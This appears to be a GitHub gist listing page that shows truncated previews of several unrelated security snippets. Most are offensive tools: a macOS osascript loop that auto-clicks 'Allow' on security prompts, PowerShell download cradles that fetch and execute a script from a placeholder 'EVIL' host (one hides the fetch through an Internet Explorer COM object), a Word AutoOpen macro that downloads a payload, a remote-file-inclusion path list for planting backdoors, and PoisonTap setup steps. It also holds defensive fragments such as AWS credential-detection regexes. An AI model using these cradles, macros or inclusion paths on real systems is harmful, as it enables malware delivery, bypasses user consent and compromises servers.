This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Accepts () | |
{ | |
osascript <<EOF | |
tell application "System Events" | |
repeat while exists (processes where name is "SecurityAgent") | |
tell process "SecurityAgent" to click button "Allow" of window 1 | |
delay 0.2 | |
end repeat | |
end tell | |
EOF |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere. | |
# Change XXpathXX to the path of your backdoor. Note that you may need to | |
# try it against every directory on the target and because of how this was | |
# culled you may need to add a question mark to your own XXpathXX URL: | |
# Eg: XXpathXX => http://www.example.com/hax.txt? | |
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX? | |
/123flashchat.php?e107path=XXpathXX | |
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX | |
/22_ultimate/templates/header.php?mainpath=XXpathXX | |
/22_ultimate/templates/header.php?mainpath=XXpathXX? |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sub AutoOpen() | |
Auto_Open | |
End Sub | |
Sub Auto_Open() | |
payloadURL = "<Download URL>" | |
Dim req: Set req = CreateObject("Microsoft.XMLHTTP") | |
Dim payloadStream: Set payloadStream = CreateObject("Adodb.Stream") | |
req.Open "GET", payloadURL, False | |
req.Send |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from scapy.all import * | |
import unicodedata | |
import sys, getopt | |
import time, datetime | |
import argparse | |
import socket | |
import fcntl | |
import struct | |
import threading |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Ensure System.Security assembly is loaded. | |
Add-Type -AssemblyName System.Security | |
function ConvertTo-CIPolicy { | |
<# | |
.SYNOPSIS | |
Converts a binary file that contains a Code Integrity policy into XML format. | |
Author: Matthew Graeber (@mattifestation) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##Server: | |
sudo apt-get update && apt-get upgrade | |
sudo apt-get install screen nodejs nodejs-legacy git npm | |
sudo npm install websocket | |
git clone https://github.com/samyk/poisontap | |
screen | |
sudo node backend_server.js | |
##piZero: | |
sudo apt-get update && apt-get upgrade |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
url - https://aws.amazon.com/blogs/security/a-safer-way-to-distribute-aws-credentials-to-ec2/ | |
Finding hard-coded credentials in your code | |
Hopefully you’re excited about deploying credentials to EC2 that are automatically rotated. Now that you’re using Roles, a good security practice would be to go through your code and remove any references to AKID/Secret. We suggest running the following regular expressions against your code base: | |
Search for access key IDs: (?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9]). In English, this regular expression says: Find me 20-character, uppercase, alphanumeric strings that don’t have any uppercase, alphanumeric characters immediately before or after. | |
Search for secret access keys: (?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=]). In English, this regular expression says: Find me 40-character, base-64 strings that don’t have any base 64 characters immediately before or after. | |
If grep is your preferred tool, run a recursive, Perl-compatible search using the following commands |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
. | |
.. | |
........ | |
@ | |
* | |
*.* | |
*.*.* | |
🎠|
OlderNewer